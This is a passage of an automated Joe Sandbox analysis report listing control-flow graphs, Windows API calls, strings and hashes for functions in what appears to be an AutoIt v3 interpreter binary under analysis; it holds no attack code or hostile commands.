call e8e650 73->103 84->42 89 f0d2cd-f0d2f2 call e87ab0 call e8e650 84->89 124 f0d0f6-f0d128 call e88e70 RegSetValueExW 86->124 125 f0d0d8-f0d0dd 86->125 108 f0d215-f0d238 call e88e70 call ea4db8 87->108 109 f0d17f-f0d19f call e8c92d call e88e70 87->109 89->42 103->42 127 f0d265-f0d282 call e88e70 call ea4db8 108->127 128 f0d23a-f0d260 call e8c5df call e88e70 108->128 126 f0d1a1-f0d1b4 RegSetValueExW 109->126 137 f0d14a-f0d151 call ea01a4 124->137 138 f0d12a-f0d143 call e87ab0 call e8e650 124->138 129 f0d0e5-f0d0e8 125->129 130 f0d0df-f0d0e1 125->130 126->42 133 f0d1b6-f0d1c0 call e87ab0 126->133 144 f0d1c5-f0d1cf call e8e650 127->144 153 f0d288-f0d2b9 call ef276a call e88e70 call ef27da 127->153 128->126 129->125 135 f0d0ea-f0d0ec 129->135 130->129 133->144 135->124 141 f0d0ee-f0d0f2 135->141 137->42 138->137 141->124 144->42 153->84
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0CE1C
                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00F1DCD0,00000000,?,00000000,?,?), ref: 00F0CEA3
                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F0CF03
                                              • _wcslen.LIBCMT ref: 00F0CF53
                                              • _wcslen.LIBCMT ref: 00F0CFCE
                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00F0D011
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F0D120
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F0D1AC
                                              • RegCloseKey.KERNELBASE(?), ref: 00F0D1E0
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0D1ED
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F0D2BF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 9721498-966354055
                                              • Opcode ID: 568d254baf895569b6cdcb5ca7631b36416948f389f138297852beaabeaa0a58
                                              • Instruction ID: 46a6cb9e6f3612ccc15ecc2eb6f6289524cf00709768b03f9cbac9cd38c993c5
                                              • Opcode Fuzzy Hash: 568d254baf895569b6cdcb5ca7631b36416948f389f138297852beaabeaa0a58
                                              • Instruction Fuzzy Hash: 2F125A356042019FD714EF14C881A2ABBE5FF88724F15845CF99EAB3A2CB31ED41DB81
                                              Function 00E83E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 163 e83e15-e83e45 call ea019b call ea016b 168 e83e6e-e83e80 call ea919b 163->168 169 e83e47-e83e49 163->169 170 e83e4a-e83e50 168->170 176 e83e82-e83e94 call ea919b 168->176 169->170 172 e83e52-e83e62 call ea015d call ea01a4 170->172 173 e83e65-e83e6b 170->173 172->173 181 e83e9a-e83eac call ea919b 176->181 182 ec4585-ec4587 176->182 186 ec458c-ec458f 181->186 187 e83eb2-e83ec4 call ea919b 181->187 182->170 186->170 190 e83eca-e83edc call ea919b 187->190 191 ec4594-ec45cb call e84154 call e84093 call e83fb8 call ea4cf3 187->191 196 ec462e-ec4633 190->196 197 e83ee2-e83ef4 call ea919b 190->197 219 ec45cd-ec45d8 191->219 220 ec4608-ec460b 191->220 196->170 199 ec4639-ec4655 call e9e2e5 196->199 207 e83efa-e83f0c call ea919b 197->207 208 ec4677-ec4688 call eea316 197->208 210 ec4657-ec465b 199->210 211 ec4662-ec466a 199->211 221 e83f0e-e83f20 call ea919b 207->221 222 e83f26 207->222 223 ec46dc-ec46e2 208->223 224 ec468a-ec46d2 call e8b25f * 2 call e85379 call e83aa3 call e8bd2c * 2 208->224 210->199 215 ec465d 210->215 211->170 216 ec4670 211->216 215->170 216->208 219->220 228 ec45da-ec45e1 219->228 229 ec460d-ec461b 220->229 230 ec45f6-ec4603 call ea01a4 220->230 221->170 221->222 227 e83f29-e83f2e call e8ad74 222->227 231 ec46f5-ec46ff call eea12a 223->231 240 ec4704-ec4706 224->240 268 ec46d4-ec46d7 224->268 241 e83f33-e83f35 227->241 228->230 236 ec45e3-ec45e7 228->236 238 ec4620-ec4629 call ea01a4 229->238 230->231 231->240 236->230 242 ec45e9-ec45f4 236->242 238->170 240->170 246 e83f3b-e83f5e call e83fb8 call e84093 call ea919b 241->246 247 ec46e4-ec46e9 241->247 242->238 264 e83fb0-e83fb3 246->264 265 e83f60-e83f72 call ea919b 246->265 247->170 252 ec46ef-ec46f0 247->252 252->231 264->227 265->264 270 e83f74-e83f86 call ea919b 265->270 268->170 273 e83f88-e83f9a call ea919b 270->273 274 e83f9c-e83fa5 270->274 273->227 273->274 274->170 276 e83fab 274->276 276->227
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 0-1645009161
                                              • Opcode ID: a545f5ec8073244c68bcd4768e15df7c5c7eb329eccd61e7675877ec65a29080
                                              • Instruction ID: ca3989084af63379a56ac2e09041fbb7a459bf4342714203a61b9d86a551d69a
                                              • Opcode Fuzzy Hash: a545f5ec8073244c68bcd4768e15df7c5c7eb329eccd61e7675877ec65a29080
                                              • Instruction Fuzzy Hash: A38105B1A41205BBDB20BF60CD52FEE3BA8AF19704F046014F90D7A1C6EB71EA41D795
                                              Function 00E8EDFE Relevance: 21.6, APIs: 14, Instructions: 612windowsleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetInputState.USER32 ref: 00E8EEB7
                                              • timeGetTime.WINMM ref: 00E8F0B7
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F1D8
                                              • TranslateMessage.USER32(?), ref: 00E8F22B
                                              • DispatchMessageW.USER32(?), ref: 00E8F239
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F24F
                                              • Sleep.KERNELBASE(0000000A), ref: 00E8F261
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                              • String ID:
                                              • API String ID: 2189390790-0
                                              • Opcode ID: 3a3fb17097b577331a88350f3cea0bd74201ffbb28629a6ff05b7b53056bc955
                                              • Instruction ID: 16b408b450ed0509804b39a6d607914c4479550bbe00632216ab8ca35cbfa0d1
                                              • Opcode Fuzzy Hash: 3a3fb17097b577331a88350f3cea0bd74201ffbb28629a6ff05b7b53056bc955
                                              • Instruction Fuzzy Hash: B9322270604341EFD724EF24C844BAAB7E0FF91308F14662AE56DA73A2D771E944DB82
                                              Function 00E835AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E835DE
                                              • RegisterClassExW.USER32(00000030), ref: 00E83608
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E83619
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00E83636
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E83646
                                              • LoadIconW.USER32(000000A9), ref: 00E8365C
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E8366B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: 4464a5e38c5606d809de5c979a48a73842885b622f9897a0a05c9400417448f7
                                              • Instruction ID: ae7ace1efe367baf2cdd45583b23599c00c71542359346e45d089d4d7652e6b5
                                              • Opcode Fuzzy Hash: 4464a5e38c5606d809de5c979a48a73842885b622f9897a0a05c9400417448f7
                                              • Instruction Fuzzy Hash: 6321C0B5A0131CAFDB40DFA4E889ADDBBB4FB09701F00821AF611A62A0D7B55545EF91
                                              Function 00EC09FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 677 ec09fb-ec0a2b call ec07cf 680 ec0a2d-ec0a38 call eaf656 677->680 681 ec0a46-ec0a52 call eb55b1 677->681 686 ec0a3a-ec0a41 call eaf669 680->686 687 ec0a6b-ec0ab4 call ec073a 681->687 688 ec0a54-ec0a69 call eaf656 call eaf669 681->688 697 ec0d1d-ec0d23 686->697 695 ec0ab6-ec0abf 687->695 696 ec0b21-ec0b2a GetFileType 687->696 688->686 699 ec0af6-ec0b1c GetLastError call eaf633 695->699 700 ec0ac1-ec0ac5 695->700 701 ec0b2c-ec0b5d GetLastError call eaf633 CloseHandle 696->701 702 ec0b73-ec0b76 696->702 699->686 700->699 706 ec0ac7-ec0af4 call ec073a 700->706 701->686 716 ec0b63-ec0b6e call eaf669 701->716 704 ec0b7f-ec0b85 702->704 705 ec0b78-ec0b7d 702->705 709 ec0b89-ec0bd7 call eb54fa 704->709 710 ec0b87 704->710 705->709 706->696 706->699 719 ec0bd9-ec0be5 call ec094b 709->719 720 ec0be7-ec0c0b call ec04ed 709->720 710->709 716->686 719->720 726 ec0c0f-ec0c19 call eb8a3e 719->726 727 ec0c0d 720->727 728 ec0c1e-ec0c61 720->728 726->697 727->726 729 ec0c82-ec0c90 728->729 730 ec0c63-ec0c67 728->730 733 ec0d1b 729->733 734 ec0c96-ec0c9a 729->734 730->729 732 ec0c69-ec0c7d 730->732 732->729 733->697 734->733 736 ec0c9c-ec0ccf CloseHandle call ec073a 734->736 739 ec0cd1-ec0cfd GetLastError call eaf633 call eb56c3 736->739 740 ec0d03-ec0d17 736->740 739->740 740->733
                                              APIs
                                                • Part of subcall function 00EC073A: CreateFileW.KERNELBASE(00000000,00000000,?,00EC0AA4,?,?,00000000,?,00EC0AA4,00000000,0000000C), ref: 00EC0757
                                              • GetLastError.KERNEL32 ref: 00EC0B0F
                                              • __dosmaperr.LIBCMT ref: 00EC0B16
                                              • GetFileType.KERNELBASE(00000000), ref: 00EC0B22
                                              • GetLastError.KERNEL32 ref: 00EC0B2C
                                              • __dosmaperr.LIBCMT ref: 00EC0B35
                                              • CloseHandle.KERNEL32(00000000), ref: 00EC0B55
                                              • CloseHandle.KERNEL32(?), ref: 00EC0C9F
                                              • GetLastError.KERNEL32 ref: 00EC0CD1
                                              • __dosmaperr.LIBCMT ref: 00EC0CD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 0afe1bc61dc24e851a55057729ca616145cc61d92a99303a81b91014da71ec2e
                                              • Instruction ID: 6c624c66e7e4ec2687e3c5319010e1af2efcb2ffe623281552415f5aa2829a0d
                                              • Opcode Fuzzy Hash: 0afe1bc61dc24e851a55057729ca616145cc61d92a99303a81b91014da71ec2e
                                              • Instruction Fuzzy Hash: 7CA10732A042188FDF19EFA8D951FAE7BE0AB46324F14125DF811AB3A1C7329D13CB51
                                              Function 00E8522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00E8551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E85539
                                                • Part of subcall function 00E851BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E851E1
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E8534B
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EC4BD7
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EC4C18
                                              • RegCloseKey.ADVAPI32(?), ref: 00EC4C5A
                                              • _wcslen.LIBCMT ref: 00EC4CC1
                                              • _wcslen.LIBCMT ref: 00EC4CD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 98802146-2727554177
                                              • Opcode ID: 6f8d8de67be636600e26846fffcf96a178c53d31a57a4dc81569b8e2ebfc7d12
                                              • Instruction ID: 36439240c08dad91fb2bcffec5494be458b40d4eca8d30c827ceba807efd5844
                                              • Opcode Fuzzy Hash: 6f8d8de67be636600e26846fffcf96a178c53d31a57a4dc81569b8e2ebfc7d12
                                              • Instruction Fuzzy Hash: C3718B71105304AEC300EF69D891DAABBF8FF99380B40142EF649A71B1EB719A49DB52
                                              Function 00E8345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E83465
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E83474
                                              • LoadIconW.USER32(00000063), ref: 00E8348A
                                              • LoadIconW.USER32(000000A4), ref: 00E8349C
                                              • LoadIconW.USER32(000000A2), ref: 00E834AE
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E834C6
                                              • RegisterClassExW.USER32(?), ref: 00E83517
                                                • Part of subcall function 00E835AB: GetSysColorBrush.USER32(0000000F), ref: 00E835DE
                                                • Part of subcall function 00E835AB: RegisterClassExW.USER32(00000030), ref: 00E83608
                                                • Part of subcall function 00E835AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E83619
                                                • Part of subcall function 00E835AB: InitCommonControlsEx.COMCTL32(?), ref: 00E83636
                                                • Part of subcall function 00E835AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E83646
                                                • Part of subcall function 00E835AB: LoadIconW.USER32(000000A9), ref: 00E8365C
                                                • Part of subcall function 00E835AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E8366B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 60b99cb28714307fde0016433b1e089e49e45c64903e0ee36cf9fd4d173f3042
                                              • Instruction ID: ae86b9a90ddafd4ec2c1ca67ef6c22ce52d7260381eeb49735fafbf8b116c8c8
                                              • Opcode Fuzzy Hash: 60b99cb28714307fde0016433b1e089e49e45c64903e0ee36cf9fd4d173f3042
                                              • Instruction Fuzzy Hash: 3F215B70E0031CABDB509FA5EC55BAABFB4FB49B51F00411AF608A62A0D3B94545EF90
                                              Function 00E83AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 818 e83aa3-e83ac6 819 e83acc-e83b35 call ea019b call e87953 call e8bf07 call e87953 * 2 call e86e52 818->819 820 ec4139-ec414c call eea12a 818->820 854 e83b3b-e83b48 call e86cce call e86b12 819->854 855 ec456b-ec457b call eea12a 819->855 826 ec4153-ec415b 820->826 829 ec415d-ec4165 826->829 830 ec416b-ec4173 826->830 829->830 834 e83b64-e83bd3 call e8bf07 call e83a70 call e8bf07 call e8557e call e841c9 call e86bfa 829->834 831 ec417e-ec4186 830->831 832 ec4175-ec417c 830->832 837 ec4188-ec418f 831->837 838 ec4191-ec4199 831->838 836 ec41a6-ec41af call eed4bf 832->836 868 e83bd9-e83c48 call e8bf07 * 2 call e8694e call e87af4 SetCurrentDirectoryW call e8bd2c * 2 call ea019b call e841a6 834->868 869 ec41b4-ec41bf 834->869 836->834 837->836 838->834 842 ec419f-ec41a1 838->842 842->836 865 e83b4d-e83b5e call e86afb 854->865 861 ec4580 855->861 861->861 865->826 865->834 916 e83c4c-e83c51 868->916 869->868 871 ec41c5-ec41f8 call e87953 call e8636d 869->871 882 ec41fe-ec4225 call ef35cd call e863db 871->882 883 ec4502-ec4519 call eea12a 871->883 882->883 896 ec422b-ec42a7 call ea016b call e8bc23 call e8bb3d 882->896 892 e83da5-e83df0 call e8bd2c * 2 call e87953 call e8bd2c call e87953 call ea01a4 883->892 918 ec42ad-ec42cf call e8bc23 896->918 919 ec446f-ec44ab call e8bc23 call ef13a0 call ee4a0c call ea4d0e 896->919 920 e83d71-e83d92 call e87953 SetCurrentDirectoryW 916->920 921 e83c57-e83c64 call e8ad74 916->921 936 ec42e5-ec42f0 call ef14a6 918->936 937 ec42d1-ec42e0 918->937 970 ec44ad-ec44d2 call e85c10 call ea01a4 call ef1388 919->970 920->892 933 e83d94-e83da2 call ea015d call ea01a4 920->933 921->920 932 e83c6a-e83c86 call e84093 call e83ff3 921->932 960 ec454e-ec4566 call eea12a 932->960 961 e83c8c-e83ca3 call e83fb8 call ea4cf3 932->961 933->892 948 ec430d-ec4318 call ef1492 936->948 949 ec42f2-ec4308 936->949 941 ec4401-ec4414 call e8bb3d 937->941 941->918 958 ec441a-ec4424 941->958 966 ec432e-ec4339 call e9e607 948->966 967 ec431a-ec4329 948->967 949->941 963 ec4426-ec4434 958->963 964 ec4457 call eea486 958->964 960->920 987 e83ca5-e83cc0 call ea6755 961->987 988 e83cc6-e83cc9 961->988 963->964 971 ec4436-ec4455 call e840e0 963->971 973 ec445c-ec4469 964->973 966->941 983 ec433f-ec435b call ee9f0d 966->983 967->941 970->892 971->973 973->918 973->919 998 ec435d-ec4388 call e8b25f call e8bd2c 983->998 999 ec438a-ec438d 983->999 987->988 993 e83df3-e83df9 987->993 992 e83ccf-e83cd4 988->992 988->993 994 e83cda-e83d13 call e8b25f call e83e15 992->994 995 ec452f-ec4537 call ee9dd5 992->995 993->992 997 e83dff-ec452a 993->997 1026 e83d30-e83d32 994->1026 1027 e83d15-e83d2c call ea01a4 call ea015d 994->1027 1020 ec453c-ec453f 995->1020 997->992 1041 ec43b6-ec43c7 call e8bc23 998->1041 1003 ec438f-ec43b5 call e8b25f call e87d27 call e8bd2c 999->1003 1004 ec43c9-ec43cc 999->1004 1003->1041 1011 ec43ed-ec43f1 call ef142e 1004->1011 1012 ec43ce-ec43d7 call ee9e3c 1004->1012 1022 ec43f6-ec4400 call ea01a4 1011->1022 1024 ec43dd-ec43e8 call ea01a4 1012->1024 1025 ec44d7-ec4500 call eea12a call ea01a4 call ea4d0e 1012->1025 1028 e83e08-e83e10 1020->1028 1029 ec4545-ec4549 1020->1029 1022->941 1024->918 1025->970 1039 e83d38-e83d3b 1026->1039 1040 e83e04 1026->1040 1027->1026 1036 e83d5e-e83d6b 1028->1036 1029->1028 1036->916 1036->920 1039->1028 1046 e83d41-e83d44 1039->1046 1040->1028 1041->1022 1046->1020 1050 e83d4a-e83d59 call e840e0 1046->1050 1050->1036
                                              APIs
                                                • Part of subcall function 00E87953: CloseHandle.KERNELBASE(?,?,00000000,00EC3A1C), ref: 00E87973
                                                • Part of subcall function 00E86E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00E86E80
                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00E83C17
                                              • _wcslen.LIBCMT ref: 00E83C96
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83D81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 3350465876-3738523708
                                              • Opcode ID: 9af33134525d13e319acbd59b6cb94a2de663c18ed15085baae4a9d49ed403af
                                              • Instruction ID: 0f19dcba2c24c977d076b4adbbc0d86c6d41ad052696cf7e1b8f651aafe37fc7
                                              • Opcode Fuzzy Hash: 9af33134525d13e319acbd59b6cb94a2de663c18ed15085baae4a9d49ed403af
                                              • Instruction Fuzzy Hash: F122BC701083409FC714EF24C891AAFBBE5BF99314F14291DF58DA72A2DB71EA49CB52
                                              Function 00E83696 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1057 e83696-e836ab 1058 e8370b-e8370d 1057->1058 1059 e836ad-e836b0 1057->1059 1058->1059 1060 e8370f 1058->1060 1061 e83711 1059->1061 1062 e836b2-e836b9 1059->1062 1063 e836f6-e836fe DefWindowProcW 1060->1063 1064 ec3dce-ec3df6 call e82f24 call e9f1c6 1061->1064 1065 e83717-e8371c 1061->1065 1066 e8378b-e83793 PostQuitMessage 1062->1066 1067 e836bf-e836c4 1062->1067 1069 e83704-e8370a 1063->1069 1100 ec3dfb-ec3e02 1064->1100 1071 e8371e-e83721 1065->1071 1072 e83743-e8376a SetTimer RegisterWindowMessageW 1065->1072 1070 e8373f-e83741 1066->1070 1073 e836ca-e836ce 1067->1073 1074 ec3e3b-ec3e4f call eec80c 1067->1074 1070->1069 1080 ec3d6f-ec3d72 1071->1080 1081 e83727-e8373a KillTimer call e8388e call e8572c 1071->1081 1072->1070 1075 e8376c-e83777 CreatePopupMenu 1072->1075 1076 e836d4-e836d9 1073->1076 1077 e83795-e8379f call e9fcbb 1073->1077 1074->1070 1092 ec3e55 1074->1092 1075->1070 1082 e836df-e836e4 1076->1082 1083 ec3e20-ec3e27 1076->1083 1094 e837a4 1077->1094 1087 ec3daa-ec3dc9 MoveWindow 1080->1087 1088 ec3d74-ec3d78 1080->1088 1081->1070 1090 e83779-e83789 call e837a6 1082->1090 1091 e836ea-e836f0 1082->1091 1083->1063 1098 ec3e2d-ec3e36 call ee1367 1083->1098 1087->1070 1095 ec3d99-ec3da5 SetFocus 1088->1095 1096 ec3d7a-ec3d7d 1088->1096 1090->1070 1091->1063 1091->1100 1092->1063 1094->1070 1095->1070 1096->1091 1101 ec3d83-ec3d94 call e82f24 1096->1101 1098->1063 1100->1063 1105 ec3e08-ec3e1b call e8388e call e838f2 1100->1105 1101->1070 1105->1063
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E83690,?,?), ref: 00E836FE
                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00E83690,?,?), ref: 00E8372A
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8374D
                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E83690,?,?), ref: 00E83758
                                              • CreatePopupMenu.USER32 ref: 00E8376C
